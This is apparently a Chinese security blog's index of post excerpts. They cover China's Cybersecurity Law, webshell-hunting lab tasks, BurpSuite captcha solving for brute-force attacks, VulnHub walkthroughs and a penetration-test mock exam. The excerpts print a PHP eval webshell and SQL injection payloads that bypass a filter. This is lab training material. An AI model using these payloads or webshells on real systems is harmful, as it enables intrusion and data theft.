网络安全法
网络安全法 [!Warning] 本人所有文章均为技术分享与知识记录,仅用于以防御为目的的教学演示,所有操作均在实验环境下进行,请各位读者勿用于其他用途,否则后果自负。 2016 年 11 月 7 日,第二十届全国人民代表大会常务委员会通过了《中华人民共和国网络安全法》,该法案于 2017 年 6 月 1 日开始生效。 全文链接:中华人民共和国网络安全法 1 关键条目第一条: 为了保障网络安全,维护网络空间主权和国家安全、社会公共利益,保护公民、法人和其他组织的合法权益,促进经济社会信息化健康发展,制定本法。 == 第二十七条 ==: 任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具;明知他人从事危害网络安全的活动的,不得为其提供技术支持、广告推广、支付结算等帮助。 第四十一条: 网络运营者收集、使用个人信息,应当遵循合法、正当、必要的原则,公开收集、使用规则,明示收集、使用信息的目的、方式和范围,并经被收集者同意。 网络...
Linux 入侵排查
Linux 入侵排查 靶机账号密码:root/linuxruqin 要求如下: Web 目录存在木马,请找到木马的密码提交; 服务器疑似存在不死马,请找到不死马的密码提交; 不死马是通过哪个文件生成的,请提交文件名; 黑客留下了木马文件,请找出黑客的服务器 ip 提交; 黑客留下了木马文件,请找出黑客服务器开启的监听端口提交。 1 Web 目录存在木马,请找到木马的密码提交 [!Warning]由于靶机按时扣费,所以一进去先把文件 dump 下来。 打包命令如下: 12tar zcvf html.tar.gz /var/www/html/*tar zcvf log.tar.gz /var/log/* 打包完成后,解压结果如下: 由于需要查找 WebShell,这里使用 D 盾扫一扫: 发现了两个可疑文件,依次查看其内容(1.tar 是网站源码,不用管): 12345678910111213141516171819202122232425# 1.php<?php eval($_POST[1]);?># index.php<?phpinclude('c...
WebShell 查杀
WebShell 查杀 靶机账号密码:root/xjwebshell 要求如下: 黑客 WebShell 里面的 flag;(flag {xxxxx-xxxx-xxxx-xxxx-xxxx}) 黑客使用的什么工具的 Shell;(github 地址的 md5,flag {md5}) 黑客隐藏 Shell 的完整路径的 md5;(flag {md5}) 黑客免杀马完整路径的 md5;(flag {md5}) 1 黑客 WebShell 里面的 flag [!Warning]由于靶机按时扣费,所以一进去先把文件 dump 下来。 打包命令如下: 1tar zcvf html.tar.gz /var/www/html/* 打包完成后,解压结果如下: 由于需要查找 WebShell,这里使用 D 盾扫一扫: 发现了四个可疑文件,依次查看其内容: 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626...
BurpSuite 验证码识别
BurpSuite 验证码识别上课用上课用。 本篇文章参考自: https://www.52pojie.cn/thread-1944555-1-1.html https://github.com/f0ng/captcha-killer-modified 1 前期准备适用情形:该篇文章只针对于在爆破口令是,每一次都会刷新的验证码,需要 BurpSuite 自动识别并传入请求中。 测试环境: Kali Linux 2024.2 Burp Suite Professional v2023.12.1(往期文章有) captcha-killer-modified captcha-killer-modified-0.24.6.zip captcha-killer-modified-0.24.6-jdk14.jar 2 工具安装2.1 安装插件首先将 captcha-killer-modified-0.24.6.zip 和 captcha-killer-modified-0.24.6-jdk14.jar 传入 Kali 中: 在 BurpSuite 上安装 captcha-kil...
DC-6
DC-6 写写打靶记录。 靶机地址:https://www.vulnhub.com/entry/dc-6,315/ 1 信息收集 首先查看 Kali IP 地址: 1234567891011121314root at kali in ~/DC6 $ ip --color address1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host noprefixroute valid_lft forever preferred_lft forever2: eth0: <BROADCAST,MULTIC...
DC-5
DC-5 写写打靶记录。 靶机地址:https://www.vulnhub.com/entry/dc-5,314/ 1 信息收集 首先查看 Kali IP 地址: 1234567891011121314root at kali in ~/DC5 $ ip --color address1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host noprefixroute valid_lft forever preferred_lft forever2: eth0: <BROADCAST,MULTIC...
DC-4
DC-4 写写打靶记录。 靶机地址:https://www.vulnhub.com/entry/dc-4,313/ 1 信息收集 首先查看 Kali IP 地址: 1234567891011121314root at kali in ~/DC4 $ ip --color address1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host noprefixroute valid_lft forever preferred_lft forever2: eth0: <BROADCAST,MULTIC...
DC-3.2
DC-3.2 写写打靶记录。 靶机地址:https://www.vulnhub.com/entry/dc-32,312/ 1 信息收集 首先查看 Kali IP 地址: 1234567891011121314root at kali in ~/DC3 $ ip --color address1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host noprefixroute valid_lft forever preferred_lft forever2: eth0: <BROADCAST,MUL...
Gaara
Gaara靶机地址:https://www.vulnhub.com/entry/gaara-1,629/ 1 信息收集 注:直接使用 VMware 导入 ova 即可。 首先查看 Kali IP 地址: 1234567891011121314root at kali in ~/Gaara $ ip --color address1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host noprefixroute valid_lft forever preferred_lft forever2: eth...
类 CISP - PTE 模拟测试
类 CISP - PTE 模拟测试这靶机是在 N 年前做 Web 渗透培训时候的考核靶机,最近又有用到,那正好水一篇。 1 SQL Injection访问关卡界面如下: 一个非常明显的 SQL Injection 场景,输入任意数字后查询即可: 经过输入尝试,可以发现如下内容: 闭合类型:单引号 闭合符号:#/%23、-- /+ 过滤字符:and、or、union、select 绕过方式:双写 注入步骤如下所示: 1234567891011121314## 判断查询列数?id=1' oorrder by 1 %23 # 正常?id=1' oorrder by 2 %23 # 正常?id=1' oorrder by 3 %23 # 报错## 查看页面回显?id=-1' uniunionon selselectect 1,2 %23 # 1,2 均回显## 查看所有数据库名?id=-1' uniunionon selselectect 1,group_concat(schema_name) from infoorrmation_schema.schemata %23 # in...









